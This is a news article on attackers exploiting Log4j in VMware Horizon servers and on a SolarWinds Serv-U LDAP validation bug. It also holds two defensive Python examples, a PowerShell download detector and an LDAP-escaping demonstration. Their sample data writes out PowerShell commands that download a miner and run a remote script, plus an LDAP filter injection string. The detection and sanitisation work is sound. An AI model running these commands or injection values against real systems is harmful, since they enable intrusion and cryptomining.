Log4j: Attackers continue to target VMware Horizon servers


According to several cybersecurity firms, attackers are still targeting VMware Horizon servers through Log4j vulnerabilities.

Two weeks ago, the UK’s National Health Service (NHS) issued a warning that an “unknown malicious group” was attempting to exploit a Log4j vulnerability (CVE-2021-44228) in VMware Horizon servers. The attackers’ goal is to establish web shells that could be used to distribute malware and ransomware, steal sensitive information, and carry out other malicious attacks.

VMware urges customers to apply patches

Since then, several cybersecurity companies have confirmed that cyberattackers continue to target VMware Horizon servers.

In a statement to ZDNet, VMware said it continues to urge customers to apply the latest guidance in its security advisory, VMSA-2021-0028, which addresses CVE-2021-44228 and CVE-2021-45046.

“We also recommend that customers review our ‘Questions and Answers’ document for the latest information and subscribe to the Security-Announce mailing list for any future notices. Any internet-connected service that has not yet been patched for the Log4j CVE-2021-44228 and CVE-2021-45046 vulnerabilities is vulnerable to cyberattacks, and VMware strongly recommends patching it,” the company says.

25,000 Horizon servers are currently accessible

Rapid7 saw a sudden increase in VMware Horizon exploitation on January 14 and identified five distinct post-exploitation paths, which indicates that several actors are involved in this mass exploitation activity.

“In the most common activity, the attacker runs PowerShell and uses the built-in System.Net.WebClient object to download cryptocurrency mining software onto the system,” Rapid7 explains.
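The behaviour Rapid7 describes (a PowerShell process on a Horizon server calling System.Net.WebClient to fetch a miner) is detectable from ordinary process-creation telemetry. The following is an added example, not Rapid7's or VMware's code: it scans constructed Sysmon-style events for PowerShell command lines that use WebClient download methods, also decoding `-EncodedCommand` payloads so a base64-wrapped variant is not missed. The parent-process check on `ws_TomcatService.exe` and the sample events are assumptions made for the illustration, not details from the article.

```python
import base64
import re

# --- Detection patterns -------------------------------------------------------
# PowerShell host binaries (matched on the image file name, not the whole path).
POWERSHELL_RE = re.compile(r"(^|\\)(powershell|pwsh)(\.exe)?$", re.IGNORECASE)
# The .NET WebClient object named in the Rapid7 quote, with or without "System.".
WEBCLIENT_RE = re.compile(r"(System\.)?Net\.WebClient", re.IGNORECASE)
# WebClient download methods used to pull a payload onto the host.
DOWNLOAD_RE = re.compile(r"\.Download(String|File|Data)\s*\(", re.IGNORECASE)
# -EncodedCommand and its accepted abbreviations, followed by the base64 blob.
ENCODED_RE = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
# Assumption: Horizon's Tomcat service wrapper as the parent of interest. The
# article does not name it; tune this to the process tree seen in your environment.
HORIZON_PARENT_RE = re.compile(r"ws_TomcatService\.exe$", re.IGNORECASE)


def decode_encoded_command(cmdline):
    """Return the script hidden behind -EncodedCommand (base64 of UTF-16LE), or None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(event):
    """Return the list of indicators found in one process-creation event."""
    reasons = []
    if not POWERSHELL_RE.search(event.get("Image", "")):
        return reasons
    cmd = event.get("CommandLine", "")
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        reasons.append("encoded command")
        cmd = f"{cmd} {decoded}"  # inspect the decoded script as well
    if WEBCLIENT_RE.search(cmd):
        reasons.append("System.Net.WebClient")
    if DOWNLOAD_RE.search(cmd):
        reasons.append("WebClient download call")
    if HORIZON_PARENT_RE.search(event.get("ParentImage", "")):
        reasons.append("spawned by Horizon Tomcat service")
    return reasons


def is_suspicious(reasons):
    """A WebClient download, or any PowerShell child of the Horizon service, is worth triage."""
    download = "System.Net.WebClient" in reasons and "WebClient download call" in reasons
    return download or "spawned by Horizon Tomcat service" in reasons


def scan(events):
    """Return (index, reasons) for each event that trips the detection."""
    return [(i, analyze(ev)) for i, ev in enumerate(events) if is_suspicious(analyze(ev))]


# --- Constructed sample telemetry (Sysmon-style fields), not real logs ---------
PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
HORIZON_TOMCAT = r"C:\Program Files\VMware\VMware View\Server\bin\ws_TomcatService.exe"
# A script an attacker might hide behind -EncodedCommand (constructed for the example).
HIDDEN_SCRIPT = "(New-Object Net.WebClient).DownloadString('http://203.0.113.9/a.ps1')|IEX"
ENCODED_SCRIPT = base64.b64encode(HIDDEN_SCRIPT.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    {   # 1: the pattern from the Rapid7 quote, in clear text, parented by Horizon's Tomcat wrapper
        "ParentImage": HORIZON_TOMCAT,
        "Image": PS_EXE,
        "CommandLine": "powershell -nop -w hidden -c \"(New-Object System.Net.WebClient)"
                       ".DownloadFile('http://198.51.100.7/miner.exe','C:\\Windows\\Temp\\svc.exe')\"",
    },
    {   # 2: the same download, base64-encoded and launched from an interactive shell
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": PS_EXE,
        "CommandLine": f"powershell -nop -w hidden -enc {ENCODED_SCRIPT}",
    },
    {   # 3: benign administrative use; must not be flagged
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": PS_EXE,
        "CommandLine": "powershell -Command Get-Service -Name WSearch",
    },
]

if __name__ == "__main__":
    for idx, reasons in scan(SAMPLE_EVENTS):
        print(f"event {idx + 1}: {', '.join(reasons)}")
```

The encoded-command branch matters in practice: `-EncodedCommand` takes base64 of UTF-16LE text, so a rule that only greps the raw command line for `WebClient` misses the second event entirely.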

Huntress posted its own blog on the issue, noting that, according to Shodan, around 25,000 Horizon servers are currently reachable from the internet worldwide.

A target of choice

Roger Koehler, vice president of operations at Huntress, told ZDNet that the NHS article does not convey the extent of the problem.

“Given the number of unpatched Horizon servers in our database (only 18% were patched last Friday evening), there is a high risk of impact to hundreds, if not thousands of businesses. This weekend is also the first time we have seen evidence of widespread escalation, from gaining initial access to launching hostile actions on Horizon servers,” he adds.

“Given that we are seeing multiple, possibly unrelated campaigns (cryptocurrencies, web shells, Cobalt Strike), it is likely that the escalation will continue. Attackers will make companies pay for not applying all patches. Although the initial web shells campaign appears to be focused on long-term access, future activity is likely to focus on targeting or impacting systems accessed through VMware Horizon. And it makes sense: attackers can use this access to impact all virtualized hosts and servers.”

Side effects

While monitoring campaigns related to the Log4j vulnerabilities, Microsoft researchers also discovered a previously undisclosed vulnerability in SolarWinds Serv-U software.

Jonathan Bar Or recounted on Twitter that, while investigating an attempt to exploit Log4j, he noticed attacks coming from serv-u.exe. “SolarWinds immediately responded, investigated and fixed the vulnerability. Their response is the fastest I have seen, truly amazing work from them!” he points out.

Microsoft then published a blog post about the issue, tracked as CVE-2021-35247, describing it as an “input validation vulnerability that could allow attackers to construct a request from a certain input and send this request over the network without sanitizing”.

In its advisory, SolarWinds clarifies that the Serv-U web login screen for LDAP authentication accepted characters that were not validated. “SolarWinds has updated the input mechanism to perform additional validation and sanitization. No downstream effects were detected, as LDAP servers ignored incorrect characters,” the company says, adding that the bug affects version 15.2.5 and earlier.
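What SolarWinds describes, unvalidated characters from a login form reaching an LDAP query, is the classic LDAP filter injection shape, and the two words in its fix, validation and sanitization, map onto two concrete controls. The block below is an added illustration, not Serv-U's code or SolarWinds' actual patch: a 'before' that splices the login name into a search filter verbatim, beside an allowlist check (validation) and RFC 4515 filter escaping (sanitization). The filter template, the attribute names and the allowlist policy are assumptions made for the example.

```python
import re

# Characters with special meaning inside an LDAP search filter (RFC 4515, section 3).
_FILTER_ESCAPES = {
    "\\": r"\5c",
    "*": r"\2a",
    "(": r"\28",
    ")": r"\29",
    "\x00": r"\00",
}

# Allowlist for the validation half: plain account names only (assumed policy).
_USERNAME_RE = re.compile(r"^[A-Za-z0-9._-]{1,64}$")

# A classic injection value: closes the sAMAccountName clause and adds its own ones.
INJECTION = "*)(uid=*))(|(uid=*"


def is_valid_username(username: str) -> bool:
    """Validation: reject anything that is not a plain account name."""
    return bool(_USERNAME_RE.match(username))


def escape_filter_value(value: str) -> str:
    """Sanitization: RFC 4515 escaping so the value can only ever be a value."""
    out = []
    for ch in value:
        if ch in _FILTER_ESCAPES:
            out.append(_FILTER_ESCAPES[ch])
        elif ord(ch) < 0x20 or ord(ch) > 0x7E:
            # Control and non-ASCII characters: escape each UTF-8 byte as \xx.
            out.extend(f"\\{b:02x}" for b in ch.encode("utf-8"))
        else:
            out.append(ch)
    return "".join(out)


def build_login_filter_unsafe(username: str) -> str:
    """'Before': the login value is spliced into the filter verbatim."""
    return f"(&(objectClass=user)(sAMAccountName={username}))"


def build_login_filter_escaped(username: str) -> str:
    """Sanitization only: whatever the user typed becomes a literal attribute value."""
    return f"(&(objectClass=user)(sAMAccountName={escape_filter_value(username)}))"


def build_login_filter_strict(username: str):
    """Validation then sanitization: returns None instead of a filter for a bad name."""
    if not is_valid_username(username):
        return None
    return build_login_filter_escaped(username)


def clause_count(ldap_filter: str) -> int:
    """Number of literal '(' in a filter; the template above always has exactly three."""
    return ldap_filter.count("(")


if __name__ == "__main__":
    print("unsafe :", build_login_filter_unsafe(INJECTION), clause_count(build_login_filter_unsafe(INJECTION)))
    print("escaped:", build_login_filter_escaped(INJECTION), clause_count(build_login_filter_escaped(INJECTION)))
    print("strict :", build_login_filter_strict(INJECTION))
```

The clause count makes the point visible: with the injection value the unsafe filter grows from three clauses to six, so the server evaluates a query the application never intended, while the escaped form stays at three because `*`, `(` and `)` have become `\2a`, `\28` and `\29`. Escaping alone is sufficient to neutralise the injection; the allowlist is the belt to that suspenders, and it is the control that produces an audit trail of rejected logins.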

Source: ZDNet.com